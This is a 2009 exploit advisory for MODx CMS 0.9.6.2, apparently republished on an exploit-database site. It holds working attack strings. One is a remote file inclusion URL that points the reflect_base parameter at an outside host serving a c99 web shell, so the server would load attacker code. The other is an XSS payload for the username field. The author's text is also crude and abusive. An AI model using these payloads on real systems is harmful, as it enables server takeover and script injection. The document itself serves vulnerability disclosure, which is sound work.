MODx CMS <= 0.9.6.2 (RFI/XSS) Multiple Remote Vulnerabilities

2009.01.23
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-94
CWE-79

######################################################################## # # :: The Codes Like A Game Anyone Can Play With It,s :: # # Title: MODx CMS <= 0.9.6.2 Multiple Remote Vulne ( RFI + XSS) # # Vendor: http://modxcms.com/assets/snippets/filedownload/download.php?path=YnVpbGRz&fileName=modx-0.9.6.2.tar.gz&utm_source=0961p2&utm_medium=web&utm_campaign=download # # Discover by : RoMaNcYxHaCkEr (Br0k3n H34rT) # # My Email : rxh0@hotmail.com [ Please Before Added Me , Be Sure I Don,t Give You Anythings :) ] # # Impact: High # # Fix: Contact With Me ;) # # Site: WwW.Sec-Code.CoM # # My Group : Security - Codes TeaM # ######################################################################## #################### - Vulne [RFI] In File snippet.reflect.php In Path assets/snippets/reflect/: #################### require($reflect_base."configs/default.config.php"); require($reflect_base."default.templates.php"); #################### - Exploit [RFI]: #################### http://WwW.Sec-Code.CoM/modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.shellbox.com.ar/%5Bc%5D/c99.txt? #################### - Exploit [XSS] In File index.php In Main Path: #################### http://WwW.Sec-Code.CoM/modx-0.9.6.2/index.php?id=1 By POST Method Posted That,s In username Box (Variable) "+onmouseover=alert(400942638703)+ #################### - Solution: #################### Declear & Filter All This Fucking Functions #################### - GreTzZ : #################### No oN3 D3s3rved Just Fuck The Lamers , Kidz Or Snitch ( I Hate Him , And Do You ...!!! ) ####################

References:

http://www.securityfocus.com/bid/32436
http://www.milw0rm.com/exploits/7204
http://svn.modxcms.com/svn/tattoo/tattoo/releases/0.9.6.3/install/changelog.txt
http://secunia.com/advisories/32824


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top